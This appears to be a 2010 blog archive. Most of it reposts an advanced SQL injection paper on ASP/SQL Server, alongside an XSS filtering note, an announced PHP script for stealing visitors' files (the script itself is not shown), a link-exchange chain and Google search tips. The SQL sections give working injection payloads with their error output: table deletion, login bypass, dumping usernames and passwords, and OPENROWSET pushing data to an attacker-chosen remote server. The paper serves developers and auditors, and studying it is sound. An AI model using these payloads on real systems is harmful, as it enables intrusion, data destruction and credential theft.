Labels

Monday, June 28, 2010

Web Application Security

1. Cross-Site Scripting

Cross-site scripting (XSS) is a threat where the attacker can inject code into a Web
application which gets executed at the visitor’s site. This is possible whenever the
input of the user gets displayed on the Web site again, for example in guest books.
This attack form can be used to exploit browser bugs like buffer overflows and
ActiveX flaws or to steal cookies

1.1 Protection: Approach I
      Filter HTML Characters
The simplest approach to disable cross-site scripting is the filtering of HTML characters.
         > =  &gt
         < =  &lt
         ”  =  &quot
        & =  &amp
If you put this sanitized code in an HTML environment it should keep you save
from cross-site scripting bugs. But imagine this code:

Wednesday, June 23, 2010

Crime files on the client computer using PHP script By Tomero

Before me clarify the content of this title, I beg to what is practiced here is not to be a negative thing for other people. If you want to practice it with evil intent, everything is not my responsibility.

Okay, back to topic. You certainly did not expect, if an when I know what the plan behind the data you save on your computer. I do not need to call the shaman and stay up all day to wait for the father shaman completed its action, he .. he .. he. Did you know? with the following PHP script, the files exist on the client computer can be retrieved easily and tucked into your server. Enough to deceive the victim to open a site that is already inserted this script, then it will automatically retrieve (upload) to the server path to your destination.Here's the script:


Friday, June 18, 2010

ELEVATING PRIVILEGES & UPLOADING FILES:

Often an administrator will follow security best-practices and configure the application to use a
non-privileged login. Having found a vulnerability with the non-privileged login, an attacker will
attempt to elevate privileges to gain full administrator privileges. An attacker could exploit known
and unknown vulnerabilities to do so. Given the number of recent vulnerabilities discovered in
SQL Server, if an attacker can execute arbitrary queries, it is relatively easy to elevate privileges.
Published advisories can be viewed at:
http://www.appsecinc.com/cgi-bin/show_policy_list.pl?app_type=1&category=3
http://www.appsecinc.com/resources/alerts/mssql/


Tuesday, June 15, 2010

RETRIEVING RESULTS FROM SQL INJECTION:

The functions OPENROWSET and OPENDATASOURCE are most commonly used to pull data
into SQL Server to be manipulated. They can however also be used to push data to a remote
SQL Server. OPENROWSET can be used to not only execute SELECT statements, but also to
execute UPDATE, INSERT, and DELETE statements on external data sources. Performing data
manipulation on remote data sources is less common and only works if the OLEDB provider
supports this functionality. The SQLOLEDB provider support all these statements.

Below is an example of pushing data to an external data source:

insert into
            OPENROWSET('SQLoledb',
            'server=servername;uid=sa;pwd=h8ck3r',
            'select * from table1')
 select * from table2


In the example above, all rows in table2 on the local SQL Server will be appended to table1 in the
remote data source. In order for the statement to execute properly the two tables must have the
same structure.
As we learned in the previous section, remote datasources can be redirected to any server of the
attacker’s choice. An attacker could change the statement above to connect to a remote
datasource such as a copy of Microsoft SQL Server running on the attacker’s machine.

Friday, June 11, 2010

DETECTION OF SQL INJECTION VULNERABILITIES

 Many developers and web administrators are complacent about SQL Injection vulnerabilities if the
attacker cannot see the SQL error messages and/or cannot return the queries result directly to
the browser. This topic was first addressed in a white paper written by Chris Ansley of
NGSSoftware (http://www.nextgenss.com/papers/more_advanced_sql_injection.pdf). This paper

will expand on possible ways this threat can be used.
When trying to exploit SQL Injection in an application, an attacker needs a method of determining
if the SQL injected is executed on the server. As well, a method of retrieving the results is
needed. Two built-in functions of SQL Server can be used for this purpose. The OPENROWSET
and OPENDATASOURCE functions allow a user in SQL Server to open remote data sources.
These functions are used to open a connection to an OLEDB provider. The OPENROWSET
function will be use in all the examples but the OPENDATASOURCE function could be used with
the same results.
This statement will return all the rows of table1 on the remote data source:

 select * from
      OPENROWSET( 'SQLoledb',
      'server=servername;uid=sa;pwd=h8ck3r',
      'select * from table1' )


Parameters:
(1) OLEDB Provider name
(2) Connection string (could be an OLEDB data source or an ODBC connection string)
(3) SQL statement

Tuesday, June 8, 2010

Advanced SQL Injection In SQL Server Applications part 4

[Advanced SQL Injection]
It is often the case that a web application will 'escape' the single quote character (and others), and otherwise 'massage' the data that is submitted by the user, such as by limiting its length.
In this section, we discuss some techniques that help attackers bypass some of the more obvious defences against SQL injection, and evade logging to a certain extent.
[Strings without quotes]
Occasionally, developers may have protected an application by (say) escaping all 'single quote' characters, perhaps by using the VBScript 'replace' function or similar:
function escape( input )
input = replace(input, "'", "''")
escape = input
end function
Admittedly, this will prevent all of the example attacks from working on our sample site, and removing ';' characters would also help a lot. However, in a larger application it is likely that several values that the user is supposed to input will be numeric. These values will not require 'delimiting', and so may provide a point at which the attacker can insert SQL.
If the attacker wishes to create a string value without using quotes, they can use the 'char' function. For example:
insert into users values( 666,
char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73),
char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73),
0xffff)
…is a query containing no quote characters, which will insert strings into a table.
Of course, if the attacker doesn't mind using a numeric username and password, the following statement would do just as well:
insert into users values( 667,
123,
123,
0xffff)
Since SQL Server automatically converts integers into 'varchar' values, the type conversion is implicit.
[Second-Order SQL Injection]
Even if an application always escapes single - quotes, an attacker can still inject SQL as long as data in the database is re-used by the application.
For example, an attacker might register with an application, creating a username
Username: admin'--
Password: password

Sunday, June 6, 2010

Advanced SQL Injection In SQL Server Applications part 3

[Leveraging Further Access]
Once an attacker has control of the database, they are likely to want to use that access to obtain further control over the network. This can be achieved in a number of ways:
1. Using the xp_cmdshell extended stored procedure to run commands as the SQL server user, on the database server
2. Using the xp_regread extended stored procedure to read registry keys, potentially including the SAM (if SQL Server is running as the local system account)
3. Use other extended stored procedures to influence the server
4. Run queries on linked servers
5. Creating custom extended stored procedures to run exploit code from within the SQL Server process
6. Use the 'bulk insert' statement to read any file on the server
7. Use bcp to create arbitrary text files on the server
8. Using the sp_OACreate, sp_OAMethod and sp_OAGetProperty system stored procedures to create Ole Automation (ActiveX) applications that can do everything an ASP script can do
These are just a few of the more common attack scenarios; it is quite possible that an attacker will be able to come up with others. We present these techniques as a collection of relatively obvious SQL Server attacks, in order to show just what is possible, given the ability to inject SQL. We will deal with each of the above points in turn.
[xp_cmdshell]

VIRAL LINKING

{Start Copy Here}


Rules :
  1. Copy Paste from {Start Copy Here} to {End Copy Here}
  2. Please Link Back to the person who tagged you and PASS this tag to many of your friends.
  3. If you have more the one Blog, please post this to all of your Blogs, the more the merrier
  4. The use of NO FOLLOW on links is not allowed, Let's all be fair!
  5. Remember to come back here at JENNY TALKS (pls don't change this link) and leave the exact post url so i can add you to the master list to help increase our rankings and improve our Technorati Authority
  6. Spread the Virus.. oooooops i mean the VIRAL LINKING and happy blogging

#1. Scraps & Shots #2. Simply Jen 3. This and That 4. Fab & Chic Finds 5.A Slice of Life 6. Jenny Talks 7.Tech Stuff Plus 8. Food on the Table 9. Aussie Talks 10. When Mom Talks 11. Moments of My Life 12. My Crossroads 13. A Life in Bloom 14. Because Life is a Blessing 15. Digiscraptology 16. BLOGSILOG 14.Cherry's Comfort Zone 15. DigiScrapz: Captured Memories 16. Buzzy Me 17. Fab Finds, Etc. 18. Thinking Out Loud 19. Wishing and Hoping 20. PRC Board Exam Results 21. Jobs Abroad 22. My Blog Portfolio17.Race Corner 18. Mommy Talks. 19. Home and Health 20. All Kinds of Me Stuff 21. Ink Baby Studios 22.The Salad Caper 23. Winding Creek Circle 24. Aggie Scraps 25. Momma Stuff 26. We Are Family 27.Gandacious 28. Busynessworld 29. Folcreative 30. Swanportraits 31. Rumination Under The Clouds 32.Consciously Think 33. Sprawt 34. Healthy Skinny 35. Geekyology 36. When Mom Speaks 37. Rumination38. Amiable Amy 39. Captured on Time 40. Pit of Gadgetry 41. Me and Mine 42. Little Peanut 43. Creative in Me 44. Around the world 45. Pea in a Pod 46. For the LOVE of Food 47. Music of My Heart 48. It’s Where the Heart Is 49. Blog in to Space 50. A Mothers Horizon 51. Simply me 52. Whats Up 53. Comedy Plus 54.Lovin' Life 55.Ozzy's Mom 56. Apple and Candie 57. I was once lost in love 58. Pinay in Love 59. Pau's Big Thoughts 60. Twisted Angel 61. Hailey's Beat and Bits 62. Living A' La Mode 63. Bits and Pieces 64. Honey and Daisy 65. Pinay Ads 66. Great Kingkay 66. It's Naptime 67. Lisgold 68. Signe Says 69. Thomas Web Links 70. Thomas Travel Tales 71. Nita's Corner 72. Great Finds and Deals 73. Nita's Ramblings 74.Batuananons 75. Filipino Online Community 76. Healthy Living and Lifestyle 77. CompTechGadgets 78.Nita's Random Thoughts 79. Make Money Online 80. Erlinda's Wandering Thoughts 81. Kitty's haven 82.This and That 83. Shoppaholic girly 84. My Life in this Wonderful World 85. My Online World 86. Joys in Life 87. Journey in Life 88. Tere's World 89. Jean's Live it Up 90. Muzikistah 91. Maharot 92. SUPASTAH!93.Life is a constant journey 94.Amazingly Me 70. Treeennndddzzz 96. otwarteInfo’s 98. AdventureSage 99. in-Tech Revolution 100. LovingMore 101. From Melissa's Desk 102. denz Recreational 103. Network of Combined Ideas 104. Sheltered Not Shattered 105. Mommying on the Fly 106. Me, Myself and Darly 107. Stay at Home Mom 108. Harmony in Motion 109. My Happy Thoughts 110. Mommyhood is Thankless 111. Life is Random. SO.I.AM 112.Life's sweet and spices 113. Rainbow Colored Me 114. My Oweini Life 115. All About Mye Life 116. Is it Bedtime Yet 117. Super Coupon Girl 118. My Life.... My Journey 119. Project Wicked Blogs and Reviews 120. Life According To Me 121. WilStop 122. I Love Pixels 123. Cellulitic Bliss 124.Underneath It All 125. Momstart 126. Pinaymama's Diary 127. My Heart 4 Him 128. 1StopMom 129.Random Chronicles 130. Maeyonnaise 131.Blessings in Life 132.Tebosupra web134.Blog Kamu
{End Copy Here}

Advanced SQL Injection In SQL Server Applications part 2

[Obtaining Information Using Error Messages]

This technique was first discovered by David Litchfield and the author in the course of a
penetration test; David later wrote a paper on the technique [1], and subsequent authors
have referenced this work. This explanation discusses the mechanisms underlying the
'error message' technique, enabling the reader to fully understand it, and potentially
originate variations of their own.

In order to manipulate the data in the database, the attacker will have to determine the
structure of certain databases and tables. For example, our 'users' table might have been
created with the following command:

create table users(  id int, 
   username varchar(255),
    password varchar(255),
    privs int
   )

..and had the following users inserted:

insert into users values( 0, 'admin', 'r00tr0x!', 0xffff )
insert into users values( 0, 'guest', 'guest', 0x0000 )
insert into users values( 0, 'chris', 'password', 0x00ff )
insert into users values( 0, 'fred', 'sesame', 0x00ff )

Let's say our attacker wants to insert a user account for himself. Without knowing the
structure of the 'users' table, he is unlikely to be successful. Even if he gets lucky, the
significance of the 'privs' field is unclear. The attacker might insert a '1', and give himself
a low - privileged account in the application, when what he was after was administrative
access.

Fortunately for the attacker, if error messages are returned from the application (the
default ASP behaviour) the attacker can determine the entire structure of the database,
and read any value that can be read by the account the ASP application is using to
connect to the SQL Server.

(The following examples use the supplied sample database and .asp scripts to illustrate
how these techniques work.)

First, the attacker wants to establish the names of the tables that the query operates on,
and the names of the fields. To do this, the attacker uses the 'having' clause of the 'select'
statement:

Username: ' having 1=1--

This provokes the following error:

Microsoft OLE DB Provider for ODBC Drivers error '80040e14' 

[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'users.id' is
invalid in the select list because it is not contained in an aggregate
function and there is no GROUP BY clause. 

/process_login.asp, line 35 

So the attacker now knows the table name and column name of the first column in the
query. They can continue through the columns by introducing each field into a 'group by'
clause, as follows:

Username: ' group by users.id having 1=1--

(which produces the error…)

Microsoft OLE DB Provider for ODBC Drivers error '80040e14' 

[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'users.username'
is invalid in the select list because it is not contained in either an
aggregate function or the GROUP BY clause. 

/process_login.asp, line 35 

Eventually the attacker arrives at the following 'username':' group by users.id, users.username, users.password, users.privs having
1=1--

… which produces no error, and is functionally equivalent to:

select * from users where username = ''

So the attacker now knows that the query is referencing only the 'users' table, and is using
the columns 'id, username, password, privs', in that order.

It would be useful if he could determine the types of each column. This can be achieved
using a 'type conversion' error message, like this:

Username: ' union select sum(username) from users--

This takes advantage of the fact that SQL server attempts to apply the 'sum' clause before
determining whether the number of fields in the two rowsets is equal. Attempting to
calculate the 'sum' of a textual field results in this message:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07' 

[Microsoft][ODBC SQL Server Driver][SQL Server]The sum or average
aggregate operation cannot take a varchar data type as an argument. 

/process_login.asp, line 35 

..which tells us that the 'username' field has type 'varchar'. If, on the other hand, we
attempt to calculate the sum() of a numeric type, we get an error message telling us that
the number of fields in the two rowsets don't match:

Username: ' union select sum(id) from users--

Microsoft OLE DB Provider for ODBC Drivers error '80040e14' 

[Microsoft][ODBC SQL Server Driver][SQL Server]All queries in an SQL
statement containing a UNION operator must have an equal number of
expressions in their target lists. 

/process_login.asp, line 35 

We can use this technique to approximately determine the type of any column of any
table in the database.

This allows the attacker to create a well - formed 'insert' query, like this:

Username: '; insert into users values( 666, 'attacker', 'foobar', 0xffff
)--

However, the potential of the technique doesn't stop there. The attacker can take advantage of any error message that reveals information about the environment, or the
database. A list of the format strings for standard error messages can be obtained by
running:

select * from master..sysmessages

Examining this list reveals some interesting messages.

One especially useful message relates to type conversion. If you attempt to convert a
string into an integer, the full contents of the string are returned in the error message. In
our sample login page, for example, the following 'username' will return the specific
version of SQL server, and the server operating system it is running on:

Username: ' union select @@version,1,1,1--

Microsoft OLE DB Provider for ODBC Drivers error '80040e07' 

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting
the nvarchar value 'Microsoft SQL Server 2000 - 8.00.194 (Intel X86) Aug
6 2000 00:57:48 Copyright (c) 1988-2000 Microsoft Corporation Enterprise
Edition on Windows NT 5.0 (Build 2195: Service Pack 2) ' to a column of
data type int. 

/process_login.asp, line 35 

This attempts to convert the built-in '@@version' constant into an integer because the
first column in the 'users' table is an integer.

This technique can be used to read any value in any table in the database. Since the
attacker is interested in usernames and passwords, they are likely to read the usernames
from the 'users' table, like this:

Username: ' union select min(username),1,1,1 from users where username >
'a'--

This selects the minimum username that is greater than 'a', and attempts to convert it to an
integer:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07' 

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting
the varchar value 'admin' to a column of data type int. 

/process_login.asp, line 35 

So the attacker now knows that the 'admin' account exists. He can now iterate through the
rows in the table by substituting each new username he discovers into the 'where' clause:

Username: ' union select min(username),1,1,1 from users where username >
'admin'-- Microsoft OLE DB Provider for ODBC Drivers error '80040e07' 

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting
the varchar value 'chris' to a column of data type int. 

/process_login.asp, line 35 

Once the attacker has determined the usernames, he can start gathering passwords:

Username: ' union select password,1,1,1 from users where username =
'admin'--

Microsoft OLE DB Provider for ODBC Drivers error '80040e07' 

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting
the varchar value 'r00tr0x!' to a column of data type int. 

/process_login.asp, line 35 

A more elegant technique is to concatenate all of the usernames and passwords into a
single string, and then attempt to convert it to an integer. This illustrates another point;
Transact-SQL statements can be string together on the same line without altering their
meaning. The following script will concatenate the values:

begin declare @ret varchar(8000)
set @ret=':'
select @ret=@ret+' '+username+'/'+password from users where
username>@ret
select @ret as ret into foo
end

The attacker 'logs in' with this 'username' (all on one line, obviously…)

Username: '; begin declare @ret varchar(8000) set @ret=':' select
@ret=@ret+' '+username+'/'+password from users where username>@ret
select @ret as ret into foo end--

This creates a table 'foo', which contains the single column 'ret', and puts our string into it.
Normally even a low-privileged user will be able to create a table in a sample database, or
the temporary database.

The attacker then selects the string from the table, as before:

Username: ' union select ret,1,1,1 from foo--

Microsoft OLE DB Provider for ODBC Drivers error '80040e07' 

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting
the varchar value ': admin/r00tr0x! guest/guest chris/password
fred/sesame' to a column of data type int./process_login.asp, line 35 

And then drops (deletes) the table, to tidy up:

Username: '; drop table foo--

These examples are barely scratching the surface of the flexibility of this technique.
Needless to say, if the attacker can obtain rich error information from the database, their
job is infinitely easier.

Friday, June 4, 2010

Advanced SQL Injection In SQL Server Applications part 1

[Abstract]
This document discusses in detail the common 'SQL injection' technique, as it applies to the popular Microsoft Internet Information Server/Active Server Pages/SQL Server platform. It discusses the various ways in which SQL can be 'injected' into the application and addresses some of the data validation and database lockdown issues that are related to this class of attack.
The paper is intended to be read by both developers of web applications which communicate with databases and by security professionals whose role includes auditing these web applications.
[Introduction]
Structured Query Language ('SQL') is a textual language used to interact with relational databases. There are many varieties of SQL; most dialects that are in common use at the moment are loosely based around SQL-92, the most recent ANSI standard. The typical unit of execution of SQL is the 'query', which is a collection of statements that typically return a single 'result set'. SQL statements can modify the structure of databases (using Data Definition Language statements, or 'DDL') and manipulate the contents of databases (using Data Manipulation Language statements, or 'DML'). In this paper, we will be specifically discussing Transact-SQL, the dialect of SQL used by Microsoft SQL Server.
SQL Injection occurs when an attacker is able to insert a series of SQL statements into a 'query' by manipulating data input into an application.
A typical SQL statement looks like this:
select id, forename, surname from authors
This statement will retrieve the 'id', 'forename' and 'surname' columns from the 'authors' table, returning all rows in the table. The 'result set' could be restricted to a specific 'author' like this:
select id, forename, surname from authors where forename = 'john' and surname = 'smith'
An important point to note here is that the string literals 'john' and 'smith' are delimited with single quotes. Presuming that the 'forename' and 'surname' fields are being gathered from user-supplied input, an attacker might be able to 'inject' some SQL into this query, by inputting values into the application like this:
Forename: jo'hn
Surname: smith
The 'query string' becomes this:
select id, forename, surname from authors where forename = 'jo'hn' and surname = 'smith'
When the database attempts to run this query, it is likely to return an error:
Server: Msg 170, Level 15, State 1, Line 1
Line 1: Incorrect syntax near 'hn'.
The reason for this is that the insertion of the 'single quote' character 'breaks out' of the single-quote delimited data. The database then tried to execute 'hn' and failed. If the attacker specified input like this:
Forename: jo'; drop table authors--
Surname:
…the authors table would be deleted, for reasons that we will go into later.
It would seem that some method of either removing single quotes from the input, or 'escaping' them in some way would handle this problem. This is true, but there are several difficulties with this method as a solution. First, not all user-supplied data is in the form of strings. If our user input could select an author by 'id' (presumably a number) for example, our query might look like this:
select id, forename, surname from authors where id=1234
In this situation an attacker can simply append SQL statements on the end of the numeric input. In other SQL dialects, various delimiters are used; in the Microsoft Jet DBMS engine, for example, dates can be delimited with the '#' character. Second, 'escaping' single quotes is not necessarily the simple cure it might initially seem, for reasons we will go into later.
We illustrate these points in further detail using a sample Active Server Pages (ASP) 'login' page, which accesses a SQL Server database and attempts to authenticate access to some fictional application.
This is the code for the 'form' page, into which the user types a username and password:




























The critical point here is the part of 'process_login.asp' which creates the 'query string' :
var sql = "select * from users where username = '" + username + "' and password = '" + password + "'"; If the user specifies the following:
Username: '; drop table users--
Password:
..the 'users' table will be deleted, denying access to the application for all users. The '--' character sequence is the 'single line comment' sequence in Transact-SQL, and the ';' character denotes the end of one query and the beginning of another. The '--' at the end of the username field is required in order for this particular query to terminate without error.
The attacker could log on as any user, given that they know the users name, using the following input:
Username: admin'--
The attacker could log in as the first user in the 'users' table, with the following input:
Username: ' or 1=1--
…and, strangely, the attacker can log in as an entirely fictional user with the following input:
Username: ' union select 1, 'fictional_user', 'some_password', 1--
The reason this works is that the application believes that the 'constant' row that the attacker specified was part of the recordset retrieved from the database.

Tuesday, June 1, 2010

20 Great Google Secrets

http://www.pcmag.com/article2/0,4149,1306756,00.asp

excl.gif No Active Links, Read the Rules - Edit by Ninja excl.gif



Google is clearly the best general-purpose search engine on the Web (see

www.pcmag.com/searchengines

But most people don't use it to its best advantage. Do you just plug in a keyword or two and hope for the best? That may be the quickest way to search, but with more than 3 billion pages in Google's index, it's still a struggle to pare results to a manageable number.

But Google is an remarkably powerful tool that can ease and enhance your Internet exploration. Google's search options go beyond simple keywords, the Web, and even its own programmers. Let's look at some of Google's lesser-known options.

Syntax Search Tricks

Using a special syntax is a way to tell Google that you want to restrict your searches to certain elements or characteristics of Web pages. Google has a fairly complete list of its syntax elements at

www.google.com/help/operators.html

. Here are some advanced operators that can help narrow down your search results.

Intitle: at the beginning of a query word or phrase (intitle:"Three Blind Mice") restricts your search results to just the titles of Web pages.

Intext: does the opposite of intitle:, searching only the body text, ignoring titles, links, and so forth. Intext: is perfect when what you're searching for might commonly appear in URLs. If you're looking for the term HTML, for example, and you don't want to get results such as

www.mysite.com/index.html

, you can enter intext:html.

Link: lets you see which pages are linking to your Web page or to another page you're interested in. For example, try typing in

link:http://www.pcmag.com


Try using site: (which restricts results to top-level domains) with intitle: to find certain types of pages. For example, get scholarly pages about Mark Twain by searching for intitle:"Mark Twain"site:edu. Experiment with mixing various elements; you'll develop several strategies for finding the stuff you want more effectively. The site: command is very helpful as an alternative to the mediocre search engines built into many sites.

Swiss Army Google

Google has a number of services that can help you accomplish tasks you may never have thought to use Google for. For example, the new calculator feature

(www.google.com/help/features.html#calculator)

lets you do both math and a variety of conversions from the search box. For extra fun, try the query "Answer to life the universe and everything."

Let Google help you figure out whether you've got the right spelling—and the right word—for your search. Enter a misspelled word or phrase into the query box (try "thre blund mise") and Google may suggest a proper spelling. This doesn't always succeed; it works best when the word you're searching for can be found in a dictionary. Once you search for a properly spelled word, look at the results page, which repeats your query. (If you're searching for "three blind mice," underneath the search window will appear a statement such as Searched the web for "three blind mice.") You'll discover that you can click on each word in your search phrase and get a definition from a dictionary.

Suppose you want to contact someone and don't have his phone number handy. Google can help you with that, too. Just enter a name, city, and state. (The city is optional, but you must enter a state.) If a phone number matches the listing, you'll see it at the top of the search results along with a map link to the address. If you'd rather restrict your results, use rphonebook: for residential listings or bphonebook: for business listings. If you'd rather use a search form for business phone listings, try Yellow Search

(www.buzztoolbox.com/google/yellowsearch.shtml).




Extended Googling

Google offers several services that give you a head start in focusing your search. Google Groups

(http://groups.google.com)

indexes literally millions of messages from decades of discussion on Usenet. Google even helps you with your shopping via two tools: Froogle
CODE
(http://froogle.google.com),

which indexes products from online stores, and Google Catalogs
CODE
(http://catalogs.google.com),

which features products from more 6,000 paper catalogs in a searchable index. And this only scratches the surface. You can get a complete list of Google's tools and services at

www.google.com/options/index.html

You're probably used to using Google in your browser. But have you ever thought of using Google outside your browser?

Google Alert

(www.googlealert.com)

monitors your search terms and e-mails you information about new additions to Google's Web index. (Google Alert is not affiliated with Google; it uses Google's Web services API to perform its searches.) If you're more interested in news stories than general Web content, check out the beta version of Google News Alerts

(www.google.com/newsalerts).

This service (which is affiliated with Google) will monitor up to 50 news queries per e-mail address and send you information about news stories that match your query. (Hint: Use the intitle: and source: syntax elements with Google News to limit the number of alerts you get.)

Google on the telephone? Yup. This service is brought to you by the folks at Google Labs

(http://labs.google.com),

a place for experimental Google ideas and features (which may come and go, so what's there at this writing might not be there when you decide to check it out). With Google Voice Search

(http://labs1.google.com/gvs.html),

you dial the Voice Search phone number, speak your keywords, and then click on the indicated link. Every time you say a new search term, the results page will refresh with your new query (you must have JavaScript enabled for this to work). Remember, this service is still in an experimental phase, so don't expect 100 percent success.

In 2002, Google released the Google API (application programming interface), a way for programmers to access Google's search engine results without violating the Google Terms of Service. A lot of people have created useful (and occasionally not-so-useful but interesting) applications not available from Google itself, such as Google Alert. For many applications, you'll need an API key, which is available free from
CODE
www.google.com/apis

. See the figures for two more examples, and visit

www.pcmag.com/solutions

for more.

Thanks to its many different search properties, Google goes far beyond a regular search engine. Give the tricks in this article a try. You'll be amazed at how many different ways Google can improve your Internet searching.


Online Extra: More Google Tips


Here are a few more clever ways to tweak your Google searches.

Search Within a Timeframe

Daterange: (start date–end date). You can restrict your searches to pages that were indexed within a certain time period. Daterange: searches by when Google indexed a page, not when the page itself was created. This operator can help you ensure that results will have fresh content (by using recent dates), or you can use it to avoid a topic's current-news blizzard and concentrate only on older results. Daterange: is actually more useful if you go elsewhere to take advantage of it, because daterange: requires Julian dates, not standard Gregorian dates. You can find converters on the Web (such as

CODE
http://aa.usno.navy.mil/data/docs/JulianDate.html

excl.gif No Active Links, Read the Rules - Edit by Ninja excl.gif


), but an easier way is to do a Google daterange: search by filling in a form at

www.researchbuzz.com/toolbox/goofresh.shtml or www.faganfinder.com/engines/google.shtml

. If one special syntax element is good, two must be better, right? Sometimes. Though some operators can't be mixed (you can't use the link: operator with anything else) many can be, quickly narrowing your results to a less overwhelming number.

More Google API Applications

Staggernation.com offers three tools based on the Google API. The Google API Web Search by Host (GAWSH) lists the Web hosts of the results for a given query

(www.staggernation.com/gawsh/).

When you click on the triangle next to each host, you get a list of results for that host. The Google API Relation Browsing Outliner (GARBO) is a little more complicated: You enter a URL and choose whether you want pages that related to the URL or linked to the URL

(www.staggernation.com/garbo/).

Click on the triangle next to an URL to get a list of pages linked or related to that particular URL. CapeMail is an e-mail search application that allows you to send an e-mail to google@capeclear.com with the text of your query in the subject line and get the first ten results for that query back. Maybe it's not something you'd do every day, but if your cell phone does e-mail and doesn't do Web browsing, this is a very handy address to know.